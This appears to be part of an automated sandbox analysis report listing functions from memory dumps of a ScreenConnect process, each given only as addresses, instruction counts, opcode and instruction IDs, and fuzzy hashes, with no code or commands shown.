                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: 05906cf8c919ee547452c68f23b80a95abb961e979546daec1a1ace32097e9e5
                                                                                                              • Instruction ID: d2299b7bc0847df79494c059ed9fe209609fc17f92b8baa683769b67beeb141c
                                                                                                              • Opcode Fuzzy Hash: 05906cf8c919ee547452c68f23b80a95abb961e979546daec1a1ace32097e9e5
                                                                                                              • Instruction Fuzzy Hash: 83118C793407108FD319EB28E954A2A77E2FF89711B1549ACEA068F3A1CB75FC45CB80
                                                                                                              Function 037078B7 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: U
                                                                                                              • API String ID: 0-3372436214
                                                                                                              • Opcode ID: cc650b3f1005ebe3bad25cc30cacb9197cd7020870a28b648902535d9efda64a
                                                                                                              • Instruction ID: ebec32ade6ad60ee68744fe7098b357163da87d1b566ff4f1019e78253da81ff
                                                                                                              • Opcode Fuzzy Hash: cc650b3f1005ebe3bad25cc30cacb9197cd7020870a28b648902535d9efda64a
                                                                                                              • Instruction Fuzzy Hash: E001F262909389EFD702DBB8D89518C7FB0DF12201B1846DAD449CB292E6B01E09D742
                                                                                                              Function 048D4FE9 Relevance: .5, Instructions: 518COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6480ca77d21af43fc3b4d8557bf9b6cb75a20ca45bef3f8119fbfdeb89cdc14d
                                                                                                              • Instruction ID: 77a3d31656418761137c188b2ba91fef1994e3ef968fc4449963aafe9a3cf7c0
                                                                                                              • Opcode Fuzzy Hash: 6480ca77d21af43fc3b4d8557bf9b6cb75a20ca45bef3f8119fbfdeb89cdc14d
                                                                                                              • Instruction Fuzzy Hash: 2C323935A00619CFDB54DF68C858AADBBB2FF88310F1186D9E509AB365DB31AD85CF40
                                                                                                              Function 048D41A9 Relevance: .5, Instructions: 496COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4415d27747163ae7af4470ba3e86ef0f36dd42d4469163e6df1bee8ee59c8bbc
                                                                                                              • Instruction ID: 0f4f896d5b530e1bcd9efb10cb7082f55b9b7ad3f5859c214cdfd38c0bbc4622
                                                                                                              • Opcode Fuzzy Hash: 4415d27747163ae7af4470ba3e86ef0f36dd42d4469163e6df1bee8ee59c8bbc
                                                                                                              • Instruction Fuzzy Hash: 6A323A34A01619CFDB54DF69C854AADBBF2FF89300F108699E909AB365DB31AD85CF40
                                                                                                              Function 048DA0F7 Relevance: .4, Instructions: 361COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0c34485717b41259d1a8f5e066a66d9eeeda34a3151f03c9d379fbe280403b0
                                                                                                              • Instruction ID: fb5f360b08e5bb7f53f00f36bf9102ab8009701cf1ac1d2be8d28dfc6689663c
                                                                                                              • Opcode Fuzzy Hash: b0c34485717b41259d1a8f5e066a66d9eeeda34a3151f03c9d379fbe280403b0
                                                                                                              • Instruction Fuzzy Hash: 4EF12A74A01219CFDB24DF65C850B9DBBB1FF49304F20869AD909EB351EB71AA85CF50
                                                                                                              Function 048D0040 Relevance: .2, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 161fe61dc68d86238b8bc93f6e230c55fb042dc1499529fb286f20480f2324ea
                                                                                                              • Instruction ID: 9da707fbdbbeab5e61cde9cbc2e0c6b7961dc1b529af313a91c9586854507275
                                                                                                              • Opcode Fuzzy Hash: 161fe61dc68d86238b8bc93f6e230c55fb042dc1499529fb286f20480f2324ea
                                                                                                              • Instruction Fuzzy Hash: 7A81F834B016059FDB14DFA8D884AAEB7B2FF8D314B148659E915EB365DB31EC02CB90
                                                                                                              Function 03703F48 Relevance: .2, Instructions: 217COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ac6bae25cba3d8796eb0f4154d420982ae9fa03d209578ff7db8db92cfdc347
                                                                                                              • Instruction ID: b53a9ae390fb5ff80c8789fb5ac823ae486ca7b427d112b164eb600a6356bdc3
                                                                                                              • Opcode Fuzzy Hash: 7ac6bae25cba3d8796eb0f4154d420982ae9fa03d209578ff7db8db92cfdc347
                                                                                                              • Instruction Fuzzy Hash: 3A718034B0420ACFEB15DB69C49466EF7F7EFC4210B1885A9D6199B395DF74EC018B90
                                                                                                              Function 048D6F20 Relevance: .2, Instructions: 215COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f41f7ffdfdeb7b73c63b7328b8488078563f08746a76659aaeac525177453731
                                                                                                              • Instruction ID: ce0c3ce2774641dfce8f430f15cf74f6269d3e3008e2ddabd5cd55336c01af28
                                                                                                              • Opcode Fuzzy Hash: f41f7ffdfdeb7b73c63b7328b8488078563f08746a76659aaeac525177453731
                                                                                                              • Instruction Fuzzy Hash: 31A1ED3590060ADFCB05DF68C590889BBB1FF99314725C69AD819AB325E771FA46CF80
                                                                                                              Function 03701238 Relevance: .2, Instructions: 214COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10e7e437992a176d3b9a30f26e5f30c9000f8a50401581b231fe9b4004b883af
                                                                                                              • Instruction ID: f54e5f8a6f9bbb10731af8bcece09b7961e636bbab19c65b47a41abbdfc3a478
                                                                                                              • Opcode Fuzzy Hash: 10e7e437992a176d3b9a30f26e5f30c9000f8a50401581b231fe9b4004b883af
                                                                                                              • Instruction Fuzzy Hash: 84718F31F00219CBDB19EBA9C4546AEB7F2AFC8700F648129E406BB384DF35AD45CB95
                                                                                                              Function 037069D8 Relevance: .2, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10229988b3a482874e4e85bb602e04c855bb76a319806a79da7d8179790d32f6
                                                                                                              • Instruction ID: 2c936b77dab6beb66af165278f69f70d85612866ce59288fca392b99549064fb
                                                                                                              • Opcode Fuzzy Hash: 10229988b3a482874e4e85bb602e04c855bb76a319806a79da7d8179790d32f6
                                                                                                              • Instruction Fuzzy Hash: F1719175B00209DFDB14EB68D494AAEBBF6FF88310B1884A9E509DB361DB30DD15CB91
                                                                                                              Function 03705AA8 Relevance: .2, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f66d236d2192e0f96b7d990f930e36b6e9892641c1268924f3c702454151885f
                                                                                                              • Instruction ID: b3c7380b39be54bea736369783209a4a78b9f5156b61416e9a840262b9864cb3
                                                                                                              • Opcode Fuzzy Hash: f66d236d2192e0f96b7d990f930e36b6e9892641c1268924f3c702454151885f
                                                                                                              • Instruction Fuzzy Hash: F3510030700206DBDB15EB78E85462FB7E6EBC6320B588979D11ADB381EF749C058BD0
                                                                                                              Function 048D2D50 Relevance: .2, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ead7f6a78024617eb9af203ec2de4421b7e0db2b4d0d19f8d50b3635b2ef644b
                                                                                                              • Instruction ID: e903ffb1569301ff225964758e475e01f59f2b9755bb1de746e077f3373944c8
                                                                                                              • Opcode Fuzzy Hash: ead7f6a78024617eb9af203ec2de4421b7e0db2b4d0d19f8d50b3635b2ef644b
                                                                                                              • Instruction Fuzzy Hash: 3D614C34A0020ACFDB14DF69D954AAEB7F2FF84314B148A69E519DB361DB35EC42CB90
                                                                                                              Function 048D1DC0 Relevance: .2, Instructions: 182COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2fe313dd488a09a5a73cbe51c93b464c0efb02451899cd4452a00c20ac7c704d
                                                                                                              • Instruction ID: 8cc62c596545b1ca13b771ed9c91ae448a0b463b6d7ab1ffab26573dd3b841af
                                                                                                              • Opcode Fuzzy Hash: 2fe313dd488a09a5a73cbe51c93b464c0efb02451899cd4452a00c20ac7c704d
                                                                                                              • Instruction Fuzzy Hash: E6516D35F112058FEB14DE69D4986BEF7F2EF89325F10892AE916E7300EB30E8408B50
                                                                                                              Function 048D7283 Relevance: .2, Instructions: 178COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: def7b6f1293a775bd6d6afe03a4b508a4f25b00f857b229785e109b18a8a0b1d
                                                                                                              • Instruction ID: 8802f2a320e1b0e6dba44c116e0d8a6b0a9da6d721c2a1a24d2829431a432796
                                                                                                              • Opcode Fuzzy Hash: def7b6f1293a775bd6d6afe03a4b508a4f25b00f857b229785e109b18a8a0b1d
                                                                                                              • Instruction Fuzzy Hash: 64618470A0120ADFD714DF69C484EAEBBF6AF88304F548A29E815EB350DB30F841CB50
                                                                                                              Function 048D3128 Relevance: .2, Instructions: 165COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6bf275769afd6162b1c17e8058c7b9b796587f06b848ec49bb266b181b5b1482
                                                                                                              • Instruction ID: 3ece214551891146057d0a5283f6c9d4da7d9ce31dc76f1cf9f0d62e73b0c5fa
                                                                                                              • Opcode Fuzzy Hash: 6bf275769afd6162b1c17e8058c7b9b796587f06b848ec49bb266b181b5b1482
                                                                                                              • Instruction Fuzzy Hash: 86614770A1120ADFDB18CF99D955FAEBBF2AF44314F048658E801EB291DB74E905CF92
                                                                                                              Function 03705A2F Relevance: .2, Instructions: 157COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: baaba77ec1dda02c261504d121cf29178b00447fb3c908fcd73e96ce41d13a7e
                                                                                                              • Instruction ID: 538ed5ee912d8e291fe5aeb2c8010c606793a956427e046ea40e24c8a7d5fda3
                                                                                                              • Opcode Fuzzy Hash: baaba77ec1dda02c261504d121cf29178b00447fb3c908fcd73e96ce41d13a7e
                                                                                                              • Instruction Fuzzy Hash: CF51E030700206DBDB15EB78D89462F7BE6EBCA310B588569E00ADB385EF749D458FD0
                                                                                                              Function 048D4A7C Relevance: .2, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d35f5af6eeb86a63f78e6ae53e32b8a80fada28a4e1e44ce78e64ef889923beb
                                                                                                              • Instruction ID: 860a0d0c192bcf489c131910d93629fc0d641536318c203aa7620fe9a44ad1e2
                                                                                                              • Opcode Fuzzy Hash: d35f5af6eeb86a63f78e6ae53e32b8a80fada28a4e1e44ce78e64ef889923beb
                                                                                                              • Instruction Fuzzy Hash: C2613B30A02219CFDB24DF68C958BA9BBF2EF85705F1046A8E509DB361DB75AD84CF40
                                                                                                              Function 0370680F Relevance: .2, Instructions: 151COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a013304be0e1c27e8a5449c16305347445c188f0335e55fd90ea4cd98e8c186
                                                                                                              • Instruction ID: 0a6badc11c8530990d2ce76c0b94dc5eae8ce96673318da5a31c9f5ab570243f
                                                                                                              • Opcode Fuzzy Hash: 1a013304be0e1c27e8a5449c16305347445c188f0335e55fd90ea4cd98e8c186
                                                                                                              • Instruction Fuzzy Hash: BA41EF74A09284CFDF12CB68C9B8AA8BFF1EF56200F1940DAC144DB3E3DA249815DB61
                                                                                                              Function 03705A81 Relevance: .2, Instructions: 151COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f247140ede832a2276a23d68b9e913171de72ccdba127dd1a2d2b74f89de6cab
                                                                                                              • Instruction ID: 2e258f831742f7591f78e340e8ba4e24fdb886a8784c94713f322ee40538744a
                                                                                                              • Opcode Fuzzy Hash: f247140ede832a2276a23d68b9e913171de72ccdba127dd1a2d2b74f89de6cab
                                                                                                              • Instruction Fuzzy Hash: 0D51E3707053428FDB16EB38D89462F7BE6ABC631075885AAD019DF386EF749C45CB90
                                                                                                              Function 037048F0 Relevance: .1, Instructions: 147COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17250bbc186bba2d3d37e3790856011ac3ec60aaf0c0ac37a22dd4d4110268f9
                                                                                                              • Instruction ID: 312d52afc127712cba84054f114e18471ee4c6a786456d61408cab912555557c
                                                                                                              • Opcode Fuzzy Hash: 17250bbc186bba2d3d37e3790856011ac3ec60aaf0c0ac37a22dd4d4110268f9
                                                                                                              • Instruction Fuzzy Hash: C1512870700605CFDB24DF7AC884A5AB7F6FF883107148668D59A9B7A5E730E8058F90
                                                                                                              Function 048DF530 Relevance: .1, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9ef80707e0db7e394d74a6b2f2b4cf5265abf9536e5ef2149d3201407076e25
                                                                                                              • Instruction ID: 1fc2f01f4e04de54727540988934b263e0abce839ed4b79253e441b19600a9d9
                                                                                                              • Opcode Fuzzy Hash: d9ef80707e0db7e394d74a6b2f2b4cf5265abf9536e5ef2149d3201407076e25
                                                                                                              • Instruction Fuzzy Hash: 9B519F34B01206DBEB25DF79D55056E77B2EF88304B248A6CD615EB391DF35ED058B80
                                                                                                              Function 048DF540 Relevance: .1, Instructions: 144COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f29f55e64cd700fee017b3f344625a694ab5fac76da609899e0befd715ed72b6
                                                                                                              • Instruction ID: fbf1b7738728878086d4c9e5a715ab0e15374a73a86784822894865b06dbe809
                                                                                                              • Opcode Fuzzy Hash: f29f55e64cd700fee017b3f344625a694ab5fac76da609899e0befd715ed72b6
                                                                                                              • Instruction Fuzzy Hash: B851B034B01206DBEB29DF69D45096E77B2EF88314B248A2CD616EB391DF35ED058F80
                                                                                                              Function 048DF1B6 Relevance: .1, Instructions: 140COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b454f3bc35f8afa2e4535234791acef1f9391a14589fe41cb1452e9914eac18
                                                                                                              • Instruction ID: 35362c01690decd287fce9ba9ff62dd3d187cbd270d26d684a7d66e69ed4af7e
                                                                                                              • Opcode Fuzzy Hash: 2b454f3bc35f8afa2e4535234791acef1f9391a14589fe41cb1452e9914eac18
                                                                                                              • Instruction Fuzzy Hash: 2641B434B01209CBEB189FB9D8547BE77B2AF88314F148A29D607E7390DF74AD419B91
                                                                                                              Function 048D1291 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a5126171ba71b108cef1ce7bc90d370b687cc7467f42bcd289f0868f2c563acb
                                                                                                              • Instruction ID: 208cf769ef2c41d5b9d4f20338e4b659ed992adeef898f81217fc64f4410e0a7
                                                                                                              • Opcode Fuzzy Hash: a5126171ba71b108cef1ce7bc90d370b687cc7467f42bcd289f0868f2c563acb
                                                                                                              • Instruction Fuzzy Hash: 31518C74A00606CFDB14CFA8C4C4AAABBF2FF89304F148A69D554DB691D734F955CB90
                                                                                                              Function 048D2D41 Relevance: .1, Instructions: 131COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8aa8e0fa0345d54f07dc1e03d7eb94bc87d580bee30aa3f55d6c30616fc1e285
                                                                                                              • Instruction ID: 1e75786db26ddd2bbf3ced14991e2960da6de3f553a7b8c594f893e3df18a9c4
                                                                                                              • Opcode Fuzzy Hash: 8aa8e0fa0345d54f07dc1e03d7eb94bc87d580bee30aa3f55d6c30616fc1e285
                                                                                                              • Instruction Fuzzy Hash: B5512C74B0020ACFDB05DF69D9559AEB7F2FF88300B148669E519E7352DB34ED418B90
                                                                                                              Function 03706598 Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b75e30f1ba3994db2f993bb8f96fd503f6eac69ca3401f8b64cbe67489b7be27
                                                                                                              • Instruction ID: f914d5b99b1ec817641e34686bc1e0fadfa8766a72d3d0c36eab4fa3f996ee1a
                                                                                                              • Opcode Fuzzy Hash: b75e30f1ba3994db2f993bb8f96fd503f6eac69ca3401f8b64cbe67489b7be27
                                                                                                              • Instruction Fuzzy Hash: BD41E874600B01CFD724DF29D868A6AB7F6FF89314B144A6CD496CB7A0DB30E856CB90
                                                                                                              Function 03701230 Relevance: .1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b102244b6251440c7a9d6ef59a0a4e1c3f3a904bf7de61f6ae3e2f05354a4cce
                                                                                                              • Instruction ID: f08e6ae7d1eabaef3a2c16d7ea58b2d0115b73b0b9c46d9ecb1f7ec0dc9cc514
                                                                                                              • Opcode Fuzzy Hash: b102244b6251440c7a9d6ef59a0a4e1c3f3a904bf7de61f6ae3e2f05354a4cce
                                                                                                              • Instruction Fuzzy Hash: 2E413D35E0020ADBDB14DFA5C890AEEBBF6BF88700F588129E415B7390DB75A945CB90
                                                                                                              Function 03705F68 Relevance: .1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfaa12aa0106f7d5bb59eb75e5340a97b797045c3183287878e2b81d546909ca
                                                                                                              • Instruction ID: f15888dd56a550d23a0619fcd41e797a3faeeaae0ea0fe18d7495806c7ec7610
                                                                                                              • Opcode Fuzzy Hash: cfaa12aa0106f7d5bb59eb75e5340a97b797045c3183287878e2b81d546909ca
                                                                                                              • Instruction Fuzzy Hash: 65414F70600705CFD720DF29C594A6AB7F6FF89320B148A58D5868B7A5E731E846CF50
                                                                                                              Function 048DBD88 Relevance: .1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 588d2ee4e89e8042d7a0383e024168db4718d97b2392253e24302d37107f4b9d
                                                                                                              • Instruction ID: 524fe77c2fb21957f5a5e68c42e990e406e4c7371cd354d97f5559184d1b63a7
                                                                                                              • Opcode Fuzzy Hash: 588d2ee4e89e8042d7a0383e024168db4718d97b2392253e24302d37107f4b9d
                                                                                                              • Instruction Fuzzy Hash: B4415031A01B049FD734CF29D89099AB7F5EF84320B118F2DE566CB690EB70F8098B91
                                                                                                              Function 048D0E39 Relevance: .1, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
